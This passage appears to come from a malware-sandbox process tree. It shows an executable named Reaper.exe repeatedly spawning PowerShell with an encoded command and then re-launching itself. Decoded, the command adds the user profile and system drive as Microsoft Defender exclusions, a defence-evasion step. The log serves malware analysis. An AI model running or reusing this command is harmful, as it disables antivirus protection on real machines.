"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAYwBlACMAPgA="
6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2100

C:\Users\Admin\AppData\Local\Temp\Reaper.exe
"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"
6⤵
PID:3920

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAYwBlACMAPgA="
7⤵
- Command and Scripting Interpreter: PowerShell
PID:3364

C:\Users\Admin\AppData\Local\Temp\Reaper.exe
"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"
7⤵
PID:3948

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAYwBlACMAPgA="
8⤵
- Command and Scripting Interpreter: PowerShell
PID:2832

C:\Users\Admin\AppData\Local\Temp\Reaper.exe
"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"
8⤵
PID:4836

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAYwBlACMAPgA="
9⤵
- Command and Scripting Interpreter: PowerShell
PID:6292

C:\Users\Admin\AppData\Local\Temp\Reaper.exe
"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"
9⤵
PID:6300

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAYwBlACMAPgA="
10⤵
- Command and Scripting Interpreter: PowerShell
PID:5476

C:\Users\Admin\AppData\Local\Temp\Reaper.exe
"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"
10⤵
PID:1532

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAYwBlACMAPgA="
11⤵
- Command and Scripting Interpreter: PowerShell
PID:6196

C:\Users\Admin\AppData\Local\Temp\Reaper.exe
"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"
11⤵
PID:6416

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAYwBlACMAPgA="
12⤵
- Command and Scripting Interpreter: PowerShell
PID:1652

C:\Users\Admin\AppData\Local\Temp\Reaper.exe
"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"
12⤵
PID:7120

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAYwBlACMAPgA="
13⤵
- Command and Scripting Interpreter: PowerShell
PID:3700

C:\Users\Admin\AppData\Local\Temp\Reaper.exe
"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"
13⤵
PID:2872

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAYwBlACMAPgA="
14⤵
- Command and Scripting Interpreter: PowerShell
PID:3576

C:\Users\Admin\AppData\Local\Temp\Reaper.exe
"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"
14⤵
PID:6432

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAYwBlACMAPgA="
15⤵
PID:6940

C:\Users\Admin\AppData\Local\Temp\Reaper.exe
"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"
15⤵
PID:3568

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAYwBlACMAPgA="
16⤵
- Command and Scripting Interpreter: PowerShell
PID:5912

C:\Users\Admin\AppData\Local\Temp\Reaper.exe
"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"
16⤵
PID:3096

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAYwBlACMAPgA="
17⤵
- Command and Scripting Interpreter: PowerShell
PID:5980

C:\Users\Admin\AppData\Local\Temp\Reaper.exe
"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"
17⤵
PID:5672

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAYwBlACMAPgA="
18⤵
- Command and Scripting Interpreter: PowerShell
PID:3840

C:\Users\Admin\AppData\Local\Temp\Reaper.exe
"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"
18⤵
PID:6968

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAYwBlACMAPgA="
19⤵
PID:6804

C:\Users\Admin\AppData\Local\Temp\Reaper.exe
"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"
19⤵
PID:4988

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAYwBlACMAPgA="
20⤵
- Command and Scripting Interpreter: PowerShell
PID:1292

C:\Users\Admin\AppData\Local\Temp\Reaper.exe
"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"
20⤵
PID:4924

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAYwBlACMAPgA="
21⤵
- Command and Scripting Interpreter: PowerShell
PID:3268

C:\Users\Admin\AppData\Local\Temp\Reaper.exe
"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"
21⤵
PID:5388

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAYwBlACMAPgA="
22⤵
- Command and Scripting Interpreter: PowerShell
PID:2708

C:\Users\Admin\AppData\Local\Temp\Reaper.exe
"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"
22⤵
PID:5952

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAYwBlACMAPgA="
23⤵
- Command and Scripting Interpreter: PowerShell
PID:6692

C:\Users\Admin\AppData\Local\Temp\Reaper.exe
"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"
23⤵
PID:6352

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAYwBlACMAPgA="
24⤵
PID:3412

C:\Users\Admin\AppData\Local\Temp\Reaper.exe
"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"
24⤵
PID:7016

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAYwBlACMAPgA="
25⤵
PID:6896

C:\Users\Admin\AppData\Local\Temp\Reaper.exe
"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"
25⤵
PID:3168

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAYwBlACMAPgA="
26⤵
PID:5476

C:\Users\Admin\AppData\Local\Temp\Reaper.exe
"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"
26⤵
PID:1792

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAYwBlACMAPgA="
27⤵
- Command and Scripting Interpreter: PowerShell
PID:5344

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
28⤵
PID:2336

C:\Users\Admin\AppData\Local\Temp\Reaper.exe
"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"
27⤵
PID:1620

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAYwBlACMAPgA="
28⤵
PID:7084

C:\Users\Admin\AppData\Local\Temp\Reaper.exe
"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"
28⤵
PID:1592

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAYwBlACMAPgA="
29⤵
- Command and Scripting Interpreter: PowerShell
PID:6984

C:\Users\Admin\AppData\Local\Temp\Reaper.exe
"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"
29⤵
PID:3936

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAYwBlACMAPgA="
30⤵
- Command and Scripting Interpreter: PowerShell
PID:5376

C:\Users\Admin\AppData\Local\Temp\Reaper.exe
"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"
30⤵
PID:5960

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAYwBlACMAPgA="
31⤵
- Command and Scripting Interpreter: PowerShell
PID:6188

C:\Users\Admin\AppData\Local\Temp\Reaper.exe
"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"
31⤵
PID:4100

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAYwBlACMAPgA="
32⤵
- Command and Scripting Interpreter: PowerShell
PID:6328

C:\Users\Admin\AppData\Local\Temp\Reaper.exe
"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"
32⤵
PID:5920

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAYwBlACMAPgA="
33⤵
PID:340

C:\Users\Admin\AppData\Local\Temp\Reaper.exe
"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"
33⤵
PID:2844

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAYwBlACMAPgA="
34⤵
- Command and Scripting Interpreter: PowerShell
PID:6800

C:\Users\Admin\AppData\Local\Temp\Reaper.exe
"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"
34⤵
PID:3108

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAYwBlACMAPgA="
35⤵
- Command and Scripting Interpreter: PowerShell
PID:6288

C:\Users\Admin\AppData\Local\Temp\Reaper.exe
"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"
35⤵
PID:4472

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAYwBlACMAPgA="
36⤵
- Command and Scripting Interpreter: PowerShell
PID:4888

C:\Users\Admin\AppData\Local\Temp\Reaper.exe
"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"
36⤵
PID:6792

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAYwBlACMAPgA="
37⤵
- Command and Scripting Interpreter: PowerShell
PID:1572

C:\Users\Admin\AppData\Local\Temp\Reaper.exe
"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"
37⤵
PID:5112

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAagBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGYAYwBlACMAPgA="
38⤵
PID:6512

C:\Users\Admin\AppData\Local\Temp\Reaper.exe
"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"
38⤵
PID:6480

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
